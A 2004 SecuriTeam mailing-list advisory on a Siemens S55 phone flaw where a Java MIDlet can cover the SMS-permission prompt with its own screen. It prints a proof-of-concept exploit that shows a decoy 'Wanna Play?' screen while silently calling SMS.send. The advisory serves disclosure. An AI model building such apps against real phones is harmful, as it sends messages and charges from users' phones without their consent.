[NEWS] Siemens S55 Unauthorized SMS Sending Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 04/28/04

  • Next message: SecuriTeam: "[NT] Multiple Vulnerabilities in HP Web JetAdmin (Read, Write, Execute, Path Disclosure, Password Decryption)" 
    To: list@securiteam.com
Date: 28 Apr 2004 12:05:48 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Siemens S55 Unauthorized SMS Sending Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

    The Siemens S55 is a cell phone and provides a Java virtual machine
    including a full-featured API for additional software development by third
    parties. A vulnerability in the phone allows attackers that are able to
    make a user install their software (Java based), to cause the phone to
    send out SMSes without the need for user interaction.

    DETAILS

    Vulnerable Systems:
     * Siemens S55

    The Java API provides the possibility to send out SMS messages through the
    Java Applications. This interface will ask for permissions to send out the
    SMS by presenting a message screen.

    The API also provides objects that allow a programmer to create personal
    screen layouts for his applications

    The vulnerability found could be described as a race condition that allows
    the programmer to overlay the message that asks for permission by his own
    screen craft.

    The result of that vulnerability will allow any program to send SMS to any
    number without notification to the user.

    Exploit:
    package hello;
    import javax.microedition.lcdui.*;
    import javax.microedition.midlet.*;
    import com.siemens.mp.game.Sound;
    import com.siemens.mp.gsm.*;
    import java.lang.*;
    import java.io.*;
         
    public class hello extends MIDlet implements CommandListener
    {
       static final String EXIT_COMMAND_LABEL = "Exit FtRs world";
       Display display;
       static hellohello;

       public void startApp (){
          HelloCanva kanvas = new HelloCanva();
          Scr2 scr2 = new Scr2();
          display = Display.getDisplay(this);
          // Menu
          Command exitCommand = new Command(EXIT_COMMAND_LABEL ,
    Command.SCREEN, 0);
          scr2.addCommand(exitCommand);
          scr2.setCommandListener(this);
          //Data
         
          // screen 1
          display.setCurrent(kanvas);
          mycall();
          // screen 2
          display.setCurrent(scr2);
          //destroyApp(false);
        }
         
        public void mycall(){
         
        String SMSstr= "Test";
         
        try {
    /* Send SMS VALIAD NUMEBER SHALL BE IN SERTED HERE*/
    SMS.send("0170-Numder", SMSstr);
    }
    /* Exception handling */
    catch (com.siemens.mp.NotAllowedException ex) {
    // Some handling code ...
    }
    catch (IOException ex) {
    //Some handling code ...
    }
    catch (IllegalArgumentException ex) {
    // Some handling code ...
    }
      } //public viod call()
         
       protected void destroyApp (boolean b){
          display.setCurrent(null);
          this.notifyDestroyed(); // notify KVM
       }
         
       protected void pauseApp ()
       { }
         
       public void commandAction (Command c, Displayable d){
          destroyApp(false);
       }
         
    }
         
    class HelloCanva extends Canvas
    {
        public void paint (Graphics g)
        {
    String str = new String("Wanna Play?");
    g.setColor(0,0,0);
    g.fillRect(0, 0, getWidth(), getHeight());
    g.setColor(255,0,0);
    g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER |
    Graphics.BASELINE);
    g.drawString("yes", (getWidth()/2)-35,(getHeight()/2)+35, Graphics.HCENTER
    | Graphics.BASELINE);
    g.drawString("no", (getWidth()/2)+35,(getHeight()/2)+35, Graphics.HCENTER
    | Graphics.BASELINE);
        }
    }
    class Scr2 extends Canvas
    {
        public void paint (Graphics g) {
    String str = new String("cool");
    g.setColor(0,0,0);
    g.fillRect(0, 0, getWidth(), getHeight());
    g.setColor(255,0,0);
    g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER |
    Graphics.BASELINE);
        }
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:ftr@phenoelit.de> FtR and
    <fx@phenoelit.de> FX.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Multiple Vulnerabilities in HP Web JetAdmin (Read, Write, Execute, Path Disclosure, Password Decryption)"